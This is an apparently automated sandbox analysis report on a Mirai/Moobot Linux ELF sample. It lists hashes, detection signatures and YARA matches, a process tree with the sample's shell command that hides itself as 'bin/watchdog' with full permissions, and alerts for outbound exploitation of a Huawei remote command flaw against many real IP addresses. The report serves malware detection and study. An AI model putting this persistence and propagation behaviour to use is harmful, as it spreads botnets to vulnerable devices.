Create Interactive Tour

Linux Analysis Report
k9fBkBGZNf.elf

Overview

General Information

Sample Name:k9fBkBGZNf.elf
Original Sample Name:a8e8bff63996bf0d6b7f50021e8f9182.elf
Analysis ID:843661
MD5:a8e8bff63996bf0d6b7f50021e8f9182
SHA1:325df08762f845634d89148773b61484c72bd826
SHA256:424e056761997d0df0dbc2cdb5b8d0fb2295143902e89dc718c5d7caeb340e3e
Tags:32elfmiraisparc
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

All domains contacted by the sample do not resolve. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:843661
Start date and time:2023-04-09 03:29:43 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 9s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:k9fBkBGZNf.elf
Original Sample Name:a8e8bff63996bf0d6b7f50021e8f9182.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@6007/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/k9fBkBGZNf.elf
PID:6232
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • k9fBkBGZNf.elf (PID: 6232, Parent: 6125, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/k9fBkBGZNf.elf
    • sh (PID: 6234, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/k9fBkBGZNf.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6236, Parent: 6234)
      • rm (PID: 6236, Parent: 6234, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6237, Parent: 6234)
      • mkdir (PID: 6237, Parent: 6234, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6238, Parent: 6234)
      • mv (PID: 6238, Parent: 6234, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/k9fBkBGZNf.elf bin/watchdog
      • sh New Fork (PID: 6239, Parent: 6234)
      • chmod (PID: 6239, Parent: 6234, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
k9fBkBGZNf.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    k9fBkBGZNf.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      k9fBkBGZNf.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xe358:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe36c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe380:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe394:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe3a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe3bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe3d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe3e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe3f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe40c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe420:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe45c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe4ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe4c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe4d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xe4e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xe358:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe36c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe380:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe394:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe3a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe3bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe3d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe3e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe3f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe40c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe420:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe45c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe4ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe4c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe4d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xe4e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: k9fBkBGZNf.elf PID: 6232JoeSecurity_MoobotYara detected MoobotJoe Security
            Process Memory Space: k9fBkBGZNf.elf PID: 6232Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x2cf2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d06:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d1a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d2e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d42:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d56:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d6a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d7e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2d92:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2da6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2dba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2dce:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2de2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2df6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e0a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e1e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e32:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e46:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e5a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e6e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2e82:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.2341.237.11.13745808372152835222 04/09/23-03:31:34.699902
            SID:2835222
            Source Port:45808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.39.194.10559212372152835222 04/09/23-03:32:04.712759
            SID:2835222
            Source Port:59212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2334.160.72.9546694372152835222 04/09/23-03:30:55.062197
            SID:2835222
            Source Port:46694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.239.25.9960888372152835222 04/09/23-03:31:57.425188
            SID:2835222
            Source Port:60888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.246.253.22847280372152835222 04/09/23-03:31:16.992421
            SID:2835222
            Source Port:47280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.214.96.15141644372152835222 04/09/23-03:32:15.164399
            SID:2835222
            Source Port:41644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23155.138.39.3441442372152835222 04/09/23-03:32:22.532628
            SID:2835222
            Source Port:41442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: k9fBkBGZNf.elfReversingLabs: Detection: 56%
            Source: k9fBkBGZNf.elfVirustotal: Detection: 62%Perma Link

            Networking

            barindex
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46694 -> 34.160.72.95:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47280 -> 197.246.253.228:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45808 -> 41.237.11.137:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60888 -> 41.239.25.99:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59212 -> 197.39.194.105:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41644 -> 197.214.96.151:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41442 -> 155.138.39.34:37215
            Source: global trafficTCP traffic: 197.17.165.32 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.8.10.194 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.5.71.147 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47280 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 47280
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 45808
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60888
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59212 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59212
            Source: unknownNetwork traffic detected: HTTP traffic on port 41644 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41442 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 41442
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 39.190.184.244:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.174.49.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.194.69.244:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.134.182.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 202.142.6.156:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.199.133.76:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.3.147.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 61.210.35.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.166.240.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.33.178.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.213.207.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 193.137.56.102:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.47.228.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.1.26.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.72.51.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.227.189.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.113.138.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.56.68.128:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.184.59.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.219.199.116:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.0.102.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.216.102.42:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.71.87.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.194.244.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.241.218.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.122.226.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.135.200.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.60.46.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 47.189.81.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.49.109.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.50.105.242:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.132.9.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.111.36.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.134.30.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.32.199.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.96.78.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.78.39.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 205.28.15.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.158.237.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.73.152.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 165.234.158.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 8.117.135.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.152.194.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.139.135.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 174.225.217.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.188.73.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.217.83.244:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 153.236.87.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.187.164.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.115.247.20:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.66.42.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.76.48.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.186.107.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.192.123.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.89.195.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 62.251.10.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.62.214.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.122.70.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.20.181.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 87.116.193.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.114.179.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 188.125.136.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 94.185.96.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.210.216.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.156.4.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.94.128.71:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.241.180.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.199.139.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 2.86.120.67:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.169.107.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 160.170.157.150:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.83.237.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 170.124.88.176:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 86.98.184.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 46.46.28.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.123.235.135:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.112.25.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.21.216.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.91.93.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 205.83.102.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.127.236.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.67.236.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 145.67.11.186:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.168.224.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.109.62.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.36.19.156:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 164.49.73.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 58.2.79.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.168.26.95:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.235.166.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.204.224.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.83.19.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.31.103.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.102.30.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.136.98.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.242.43.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 202.156.230.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.152.244.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.19.96.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.92.167.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.23.130.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.59.141.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 112.67.199.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 62.94.112.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 59.98.192.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 20.82.247.28:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.158.94.71:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.142.173.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 45.108.213.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.49.218.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.30.251.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.13.234.253:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.224.115.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.72.141.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.81.189.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 131.49.179.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.236.177.52:37215
